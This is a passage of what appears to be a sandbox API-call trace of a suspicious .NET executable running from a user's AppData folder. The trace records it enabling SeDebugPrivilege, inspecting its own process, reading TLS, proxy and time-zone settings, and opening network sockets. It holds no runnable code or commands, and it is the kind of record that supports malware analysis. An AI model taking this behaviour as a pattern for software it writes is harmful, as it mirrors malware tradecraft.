ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0134.188] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.config", nBufferLength=0x105, lpBuffer=0x19dd2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.config", lpFilePart=0x0) returned 0x67 [0134.188] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.config" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x19e2c8 | out: lpFileInformation=0x19e2c8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0134.189] GetCurrentProcess () returned 0xffffffff [0134.189] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e40c | out: TokenHandle=0x19e40c*=0x2ac) returned 1 [0134.189] GetCurrentProcess () returned 0xffffffff [0134.189] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e40c | out: TokenHandle=0x19e40c*=0x2b0) returned 1 [0134.306] GetCurrentProcess () returned 0xffffffff [0134.306] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e26c | out: TokenHandle=0x19e26c*=0x2b4) returned 1 [0134.647] GetCurrentProcess () returned 0xffffffff [0134.648] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e27c | out: TokenHandle=0x19e27c*=0x2b8) returned 1 [0135.038] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f3b4 | out: phkResult=0x19f3b4*=0x2bc) returned 0x0 [0135.038] RegQueryValueExW (in: hKey=0x2bc, lpValueName="SchUseStrongCrypto", lpReserved=0x0, lpType=0x19f3d0, lpData=0x0, lpcbData=0x19f3cc*=0x0 | out: lpType=0x19f3d0*=0x4, lpData=0x0, lpcbData=0x19f3cc*=0x4) returned 0x0 [0135.039] RegQueryValueExW (in: hKey=0x2bc, lpValueName="SchUseStrongCrypto", lpReserved=0x0, lpType=0x19f3d0, lpData=0x19f3bc, lpcbData=0x19f3cc*=0x4 | out: lpType=0x19f3d0*=0x4, lpData=0x19f3bc*=0x1, lpcbData=0x19f3cc*=0x4) returned 0x0 [0135.041] RegQueryValueExW (in: hKey=0x2bc, lpValueName="SchUseStrongCrypto", lpReserved=0x0, lpType=0x19f408, lpData=0x0, lpcbData=0x19f404*=0x0 | out: lpType=0x19f408*=0x4, lpData=0x0, lpcbData=0x19f404*=0x4) returned 0x0 [0135.043] RegCloseKey (hKey=0x2bc) returned 0x0 [0135.052] GetCurrentProcessId () returned 0xbb4 [0135.063] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x19ec4c | out: lpLuid=0x19ec4c*(LowPart=0x14, HighPart=0)) returned 1 [0135.066] GetCurrentProcess () returned 0xffffffff [0135.066] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x19ec48 | out: TokenHandle=0x19ec48*=0x2c4) returned 1 [0135.067] AdjustTokenPrivileges (in: TokenHandle=0x2c4, DisableAllPrivileges=0, NewState=0x2289b34*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0135.067] CloseHandle (hObject=0x2c4) returned 1 [0135.070] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbb4) returned 0x2c4 [0135.158] EnumProcessModules (in: hProcess=0x2c4, lphModule=0x2289b78, cb=0x100, lpcbNeeded=0x19f3bc | out: lphModule=0x2289b78, lpcbNeeded=0x19f3bc) returned 1 [0135.160] GetModuleInformation (in: hProcess=0x2c4, hModule=0x400000, lpmodinfo=0x2289cb8, cb=0xc | out: lpmodinfo=0x2289cb8*(lpBaseOfDll=0x400000, SizeOfImage=0x8000, EntryPoint=0x0)) returned 1 [0135.161] CoTaskMemAlloc (cb=0x804) returned 0x50f698 [0135.161] GetModuleBaseNameW (in: hProcess=0x2c4, hModule=0x400000, lpBaseName=0x50f698, nSize=0x800 | out: lpBaseName="jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe") returned 0x3a [0135.162] CoTaskMemFree (pv=0x50f698) [0135.163] CoTaskMemAlloc (cb=0x804) returned 0x50f698 [0135.163] GetModuleFileNameExW (in: hProcess=0x2c4, hModule=0x400000, lpFilename=0x50f698, nSize=0x800 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe")) returned 0x60 [0135.163] CoTaskMemFree (pv=0x50f698) [0135.165] CloseHandle (hObject=0x2c4) returned 1 [0135.165] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe", nBufferLength=0x105, lpBuffer=0x19eec4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe", lpFilePart=0x0) returned 0x60 [0135.165] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.SecurityProtocol", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f3b4 | out: phkResult=0x19f3b4*=0x0) returned 0x2 [0135.270] EtwEventRegister () returned 0x0 [0135.272] EtwEventSetInformation () returned 0x0 [0135.443] GetCurrentProcessId () returned 0xbb4 [0135.443] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbb4) returned 0x2c8 [0135.443] EnumProcessModules (in: hProcess=0x2c8, lphModule=0x228fc2c, cb=0x100, lpcbNeeded=0x19f3c4 | out: lphModule=0x228fc2c, lpcbNeeded=0x19f3c4) returned 1 [0135.444] GetModuleInformation (in: hProcess=0x2c8, hModule=0x400000, lpmodinfo=0x228fd6c, cb=0xc | out: lpmodinfo=0x228fd6c*(lpBaseOfDll=0x400000, SizeOfImage=0x8000, EntryPoint=0x0)) returned 1 [0135.444] CoTaskMemAlloc (cb=0x804) returned 0x50f698 [0135.444] GetModuleBaseNameW (in: hProcess=0x2c8, hModule=0x400000, lpBaseName=0x50f698, nSize=0x800 | out: lpBaseName="jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe") returned 0x3a [0135.444] CoTaskMemFree (pv=0x50f698) [0135.444] CoTaskMemAlloc (cb=0x804) returned 0x50f698 [0135.444] GetModuleFileNameExW (in: hProcess=0x2c8, hModule=0x400000, lpFilename=0x50f698, nSize=0x800 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe")) returned 0x60 [0135.445] CoTaskMemFree (pv=0x50f698) [0135.445] CloseHandle (hObject=0x2c8) returned 1 [0135.445] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe", nBufferLength=0x105, lpBuffer=0x19eecc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe", lpFilePart=0x0) returned 0x60 [0135.445] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.SchSendAuxRecord", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f3bc | out: phkResult=0x19f3bc*=0x0) returned 0x2 [0135.446] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f3bc | out: phkResult=0x19f3bc*=0x2c8) returned 0x0 [0135.446] RegQueryValueExW (in: hKey=0x2c8, lpValueName="SchSendAuxRecord", lpReserved=0x0, lpType=0x19f3d8, lpData=0x0, lpcbData=0x19f3d4*=0x0 | out: lpType=0x19f3d8*=0x0, lpData=0x0, lpcbData=0x19f3d4*=0x0) returned 0x2 [0135.446] RegCloseKey (hKey=0x2c8) returned 0x0 [0137.124] GetCurrentProcess () returned 0xffffffff [0137.124] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19f068 | out: TokenHandle=0x19f068*=0x2cc) returned 1 [0137.127] GetCurrentProcess () returned 0xffffffff [0137.127] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19f078 | out: TokenHandle=0x19f078*=0x2d4) returned 1 [0137.130] QueryPerformanceFrequency (in: lpFrequency=0x475a50 | out: lpFrequency=0x475a50*=100000000) returned 1 [0137.130] QueryPerformanceCounter (in: lpPerformanceCount=0x19f3ec | out: lpPerformanceCount=0x19f3ec*=3620296811693) returned 1 [0137.139] GetCurrentProcess () returned 0xffffffff [0137.139] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19f034 | out: TokenHandle=0x19f034*=0x2d8) returned 1 [0137.143] GetCurrentProcess () returned 0xffffffff [0137.143] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19f044 | out: TokenHandle=0x19f044*=0x2dc) returned 1 [0137.164] GetCurrentProcess () returned 0xffffffff [0137.164] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19f048 | out: TokenHandle=0x19f048*=0x2e0) returned 1 [0137.168] GetCurrentProcess () returned 0xffffffff [0137.168] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19f058 | out: TokenHandle=0x19f058*=0x2e4) returned 1 [0137.173] GetCurrentProcess () returned 0xffffffff [0137.173] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19f2d0 | out: TokenHandle=0x19f2d0*=0x2e8) returned 1 [0138.032] CoTaskMemAlloc (cb=0xcc0) returned 0x5173d8 [0138.033] RasEnumConnectionsW (in: param_1=0x5173d8, param_2=0x19f2e0, param_3=0x19f2e4 | out: param_1=0x5173d8, param_2=0x19f2e0, param_3=0x19f2e4) returned 0x0 [0138.346] CoTaskMemFree (pv=0x5173d8) [0138.359] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x19f0c8 | out: lpWSAData=0x19f0c8) returned 0 [0138.368] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x344 [0138.379] setsockopt (s=0x344, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0138.379] closesocket (s=0x344) returned 0 [0138.380] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x344 [0138.381] setsockopt (s=0x344, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0138.381] closesocket (s=0x344) returned 0 [0138.381] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x344 [0138.382] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x348 [0138.382] ioctlsocket (in: s=0x344, cmd=-2147195266, argp=0x19f2e8 | out: argp=0x19f2e8) returned 0 [0138.382] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x34c [0138.383] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x350 [0138.383] ioctlsocket (in: s=0x34c, cmd=-2147195266, argp=0x19f2e8 | out: argp=0x19f2e8) returned 0 [0138.384] WSAIoctl (in: s=0x344, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x19f2d0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x19f2d0, lpOverlapped=0x0) returned -1 [0138.386] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x19f000, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0138.391] WSAEventSelect (s=0x344, hEventObject=0x348, lNetworkEvents=512) returned 0 [0138.391] WSAIoctl (in: s=0x34c, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x19f2d0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x19f2d0, lpOverlapped=0x0) returned -1 [0138.391] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x19f000, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0138.391] WSAEventSelect (s=0x34c, hEventObject=0x350, lNetworkEvents=512) returned 0 [0138.391] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x358 [0138.391] RasConnectionNotificationW (param_1=0xffffffff, param_2=0x358, param_3=0x3) returned 0x0 [0138.399] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x19f2fc | out: phkResult=0x19f2fc*=0x370) returned 0x0 [0138.400] RegOpenKeyExW (in: hKey=0x370, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2b0 | out: phkResult=0x19f2b0*=0x374) returned 0x0 [0138.400] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x378 [0138.400] RegNotifyChangeKeyValue (hKey=0x374, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x378, fAsynchronous=1) returned 0x0 [0138.402] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2b4 | out: phkResult=0x19f2b4*=0x37c) returned 0x0 [0138.402] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x380 [0138.402] RegNotifyChangeKeyValue (hKey=0x37c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x380, fAsynchronous=1) returned 0x0 [0138.402] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2b4 | out: phkResult=0x19f2b4*=0x384) returned 0x0 [0138.402] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x388 [0138.403] RegNotifyChangeKeyValue (hKey=0x384, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x388, fAsynchronous=1) returned 0x0 [0138.403] GetCurrentProcess () returned 0xffffffff [0138.403] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19f2a4 | out: TokenHandle=0x19f2a4*=0x38c) returned 1 [0138.407] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x19eba8 | out: phkResult=0x19eba8*=0x390) returned 0x0 [0138.407] RegQueryValueExW (in: hKey=0x390, lpValueName="LegacyWPADSupport", lpReserved=0x0, lpType=0x19ebc4, lpData=0x0, lpcbData=0x19ebc0*=0x0 | out: lpType=0x19ebc4*=0x0, lpData=0x0, lpcbData=0x19ebc0*=0x0) returned 0x2 [0138.407] RegCloseKey (hKey=0x390) returned 0x0 [0138.429] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x51c8a8 [0138.441] WinHttpSetTimeouts (hInternet=0x51c8a8, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1 [0138.442] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x19f2b0 | out: pProxyConfig=0x19f2b0) returned 1 [0138.486] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_Disabled", lpBuffer=0x19eb00, nSize=0x90 | out: lpBuffer="") returned 0x0 [0138.486] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_MinCount", lpBuffer=0x19eb00, nSize=0x90 | out: lpBuffer="") returned 0x0 [0138.493] EtwEventRegister () returned 0x0 [0138.493] EtwEventSetInformation () returned 0x0 [0138.497] GetCurrentProcess () returned 0xffffffff [0138.497] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19f010 | out: TokenHandle=0x19f010*=0x3e4) returned 1 [0138.499] GetCurrentProcess () returned 0xffffffff [0138.499] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19f020 | out: TokenHandle=0x19f020*=0x3f0) returned 1 [0138.502] SetEvent (hEvent=0x294) returned 1 [0138.533] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x19f1f8*=0x358, lpdwindex=0x19f014 | out: lpdwindex=0x19f014) returned 0x80010115 [0138.575] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x19f1d8*=0x348, lpdwindex=0x19eff4 | out: lpdwindex=0x19eff4) returned 0x80010115 [0138.575] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x19f1d8*=0x350, lpdwindex=0x19eff4 | out: lpdwindex=0x19eff4) returned 0x80010115 [0138.575] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x19f22c*=0x378, lpdwindex=0x19f04c | out: lpdwindex=0x19f04c) returned 0x80010115 [0138.576] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x19f22c*=0x380, lpdwindex=0x19f04c | out: lpdwindex=0x19f04c) returned 0x80010115 [0138.576] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x19f22c*=0x388, lpdwindex=0x19f04c | out: lpdwindex=0x19f04c) returned 0x80010115 [0138.580] GetCurrentProcess () returned 0xffffffff [0138.580] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19ef68 | out: TokenHandle=0x19ef68*=0x430) returned 1 [0138.581] GetCurrentProcess () returned 0xffffffff [0138.581] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19ef78 | out: TokenHandle=0x19ef78*=0x434) returned 1 [0138.583] GetTimeZoneInformation (in: lpTimeZoneInformation=0x19f0e8 | out: lpTimeZoneInformation=0x19f0e8) returned 0x2 [0138.589] GetDynamicTimeZoneInformation (in: pTimeZoneInformation=0x19ef44 | out: pTimeZoneInformation=0x19ef44) returned 0x2 [0138.591] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f028 | out: phkResult=0x19f028*=0x43c) returned 0x0 [0138.591] RegQueryValueExW (in: hKey=0x43c, lpValueName="TZI", lpReserved=0x0, lpType=0x19f044, lpData=0x0, lpcbData=0x19f040*=0x0 | out: lpType=0x19f044*=0x3, lpData=0x0, lpcbData=0x19f040*=0x2c) returned 0x0 [0138.591] RegQueryValueExW (in: hKey=0x43c, lpValueName="TZI", lpReserved=0x0, lpType=0x19f044, lpData=0x22a0b58, lpcbData=0x19f040*=0x2c | out: lpType=0x19f044*=0x3, lpData=0x22a0b58*, lpcbData=0x19f040*=0x2c) returned 0x0 [0138.592] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time\\Dynamic DST", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x0) returned 0x2 [0138.593] RegQueryValueExW (in: hKey=0x43c, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x19f01c, lpData=0x0, lpcbData=0x19f018*=0x0 | out: lpType=0x19f01c*=0x1, lpData=0x0, lpcbData=0x19f018*=0x20) returned 0x0 [0138.593] RegQueryValueExW (in: hKey=0x43c, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x19f01c, lpData=0x22a0f7c, lpcbData=0x19f018*=0x20 | out: lpType=0x19f01c*=0x1, lpData="@tzres.dll,-320", lpcbData=0x19f018*=0x20) returned 0x0 [0138.593] RegQueryValueExW (in: hKey=0x43c, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x19f01c, lpData=0x0, lpcbData=0x19f018*=0x0 | out: lpType=0x19f01c*=0x1, lpData=0x0, lpcbData=0x19f018*=0x20) returned 0x0 [0138.593] RegQueryValueExW (in: hKey=0x43c, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x19f01c, lpData=0x22a0fd4, lpcbData=0x19f018*=0x20 | out: lpType=0x19f01c*=0x1, lpData="@tzres.dll,-322", lpcbData=0x19f018*=0x20) returned 0x0 [0138.593] RegQueryValueExW (in: hKey=0x43c, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x19f01c, lpData=0x0, lpcbData=0x19f018*=0x0 | out: lpType=0x19f01c*=0x1, lpData=0x0, lpcbData=0x19f018*=0x20) returned 0x0 [0138.593] RegQueryValueExW (in: hKey=0x43c, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x19f01c, lpData=0x22a102c, lpcbData=0x19f018*=0x20 | out: lpType=0x19f01c*=0x1, lpData="@tzres.dll,-321", lpcbData=0x19f018*=0x20) returned 0x0 [0138.630] CoTaskMemAlloc (cb=0x20c) returned 0x527518 [0138.630] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x527518 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0138.638] CoTaskMemFree (pv=0x527518) [0138.639] CoTaskMemAlloc (cb=0x20c) returned 0x527518 [0138.639] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x19f038, pwszFileMUIPath=0x527518, pcchFileMUIPath=0x19f03c, pululEnumerator=0x19f030 | out: pwszLanguage=0x0, pcchLanguage=0x19f038, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x19f03c, pululEnumerator=0x19f030) returned 1 [0138.660] CoTaskMemFree (pv=0x0) [0138.660] CoTaskMemFree (pv=0x527518) [0138.661] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x46c0001 [0138.694] CoTaskMemAlloc (cb=0x3ec) returned 0x52a7f8 [0138.694] LoadStringW (in: hInstance=0x46c0001, uID=0x140, lpBuffer=0x52a7f8, cchBufferMax=500 | out: lpBuffer="(UTC+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna") returned 0x3c [0138.695] CoTaskMemFree (pv=0x52a7f8) [0138.695] FreeLibrary (hLibModule=0x46c0001) returned 1 [0138.695] CoTaskMemAlloc (cb=0x20c) returned 0x527518 [0138.695] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x527518 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0138.695] CoTaskMemFree (pv=0x527518) [0138.696] CoTaskMemAlloc (cb=0x20c) returned 0x527518 [0138.696] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x19f038, pwszFileMUIPath=0x527518, pcchFileMUIPath=0x19f03c, pululEnumerator=0x19f030 | out: pwszLanguage=0x0, pcchLanguage=0x19f038, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x19f03c, pululEnumerator=0x19f030) returned 1 [0138.699] CoTaskMemFree (pv=0x0) [0138.699] CoTaskMemFree (pv=0x527518) [0138.699] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x46c0001 [0138.701] CoTaskMemAlloc (cb=0x3ec) returned 0x52a7f8 [0138.701] LoadStringW (in: hInstance=0x46c0001, uID=0x142, lpBuffer=0x52a7f8, cchBufferMax=500 | out: lpBuffer="W. Europe Standard Time") returned 0x17 [0138.701] CoTaskMemFree (pv=0x52a7f8) [0138.701] FreeLibrary (hLibModule=0x46c0001) returned 1 [0138.702] CoTaskMemAlloc (cb=0x20c) returned 0x527518 [0138.702] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x527518 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0138.702] CoTaskMemFree (pv=0x527518) [0138.702] CoTaskMemAlloc (cb=0x20c) returned 0x527518 [0138.702] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x19f038, pwszFileMUIPath=0x527518, pcchFileMUIPath=0x19f03c, pululEnumerator=0x19f030 | out: pwszLanguage=0x0, pcchLanguage=0x19f038, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x19f03c, pululEnumerator=0x19f030) returned 1 [0138.704] CoTaskMemFree (pv=0x0) [0138.704] CoTaskMemFree (pv=0x527518) [0138.704] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x46c0001 [0138.707] CoTaskMemAlloc (cb=0x3ec) returned 0x52a7f8 [0138.707] LoadStringW (in: hInstance=0x46c0001, uID=0x141, lpBuffer=0x52a7f8, cchBufferMax=500 | out: lpBuffer="W. Europe Daylight Time") returned 0x17 [0138.707] CoTaskMemFree (pv=0x52a7f8) [0138.707] FreeLibrary (hLibModule=0x46c0001) returned 1 [0138.709] RegCloseKey (hKey=0x43c) returned 0x0 [0138.709] SetEvent (hEvent=0x294) returned 1 [0138.724] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x19f244 | out: pFixedInfo=0x0, pOutBufLen=0x19f244) returned 0x6f [0138.780] LocalAlloc (uFlags=0x0, uBytes=0x248) returned 0x527518 [0138.780] GetNetworkParams (in: pFixedInfo=0x527518, pOutBufLen=0x19f244 | out: pFixedInfo=0x527518, pOutBufLen=0x19f244) returned 0x0 [0138.797] LocalFree (hMem=0x527518) returned 0x0 [0138.799] CoTaskMemAlloc (cb=0x20c) returned 0x527518 [0138.799] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_Disabled", lpBuffer=0x527518, nSize=0x104 | out: lpBuffer="") returned 0x0 [0138.799] CoTaskMemFree (pv=0x527518) [0138.799] CoTaskMemAlloc (cb=0x20c) returned 0x527518 [0138.799] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_MinCount", lpBuffer=0x527518, nSize=0x104 | out: lpBuffer="") returned 0x0 [0138.799] CoTaskMemFree (pv=0x527518) [0138.802] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, 